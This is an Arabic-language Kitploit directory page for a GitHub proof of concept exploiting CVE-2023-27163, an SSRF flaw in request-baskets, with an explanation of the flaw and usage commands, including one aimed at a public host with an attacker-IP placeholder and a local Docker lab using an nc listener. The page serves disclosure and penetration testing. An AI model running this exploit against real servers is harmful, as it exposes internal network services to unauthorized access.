Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27163 — إثبات المفهوم لتزوير الطلب من جانب الخادم (SSRF) في request-baskets (V<= v.1.2.1) | Kitploit
أدوات/GitHubGitHub/mastercode112/cve-2023-27163
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

إثبات المفهوم لتزوير الطلب من جانب الخادم (SSRF) في request-baskets (V<= v.1.2.1)

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لـ SSRF على Request-Baskets (CVE-2023-27163)

يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2023-27163، وهي ثغرة من نوع تزوير الطلب من جانب الخادم (SSRF) تم اكتشافها في request-baskets حتى الإصدار 1.2.1. تسمح هذه الثغرة للمهاجمين بالوصول إلى موارد الشبكة والمعلومات الحساسة من خلال استغلال مكون /api/baskets/{name} عبر طلب API مُصمم.

الاستخدام

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>

كيف يعمل؟

Request-baskets هو تطبيق ويب صُمم لجمع وتسجيل الطلبات على مسار معين، يُسمى basket. عند إنشائه، يمكن للمستخدم تحديد خادم آخر لإعادة توجيه الطلب. المشكلة هنا هي أن المستخدم يمكنه تحديد خدمات غير مقصودة، مثل التطبيقات المغلقة على الشبكة.

على سبيل المثال: لنفترض أن الخادم يستضيف Request-baskets (المنفذ 55555) وخادم Flask على المنفذ 8000. تم تكوين Flask للتفاعل فقط مع localhost. من خلال إنشاء basket يقوم بإعادة التوجيه إلى http://localhost:8000، يمكن للمهاجم الوصول إلى خادم Flask المقيد سابقًا.

الاختبار على localhost

صورة إثبات المفهوم

  1. تشغيل حاوية Docker لـ Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. تنزيل إثبات المفهوم
root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. انتظار اتصال
root@kitploit:~
nc -lvp 8000
  1. حفظ عنوان IP لمضيف Docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. تشغيل إثبات المفهوم
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
تنزيل الأداة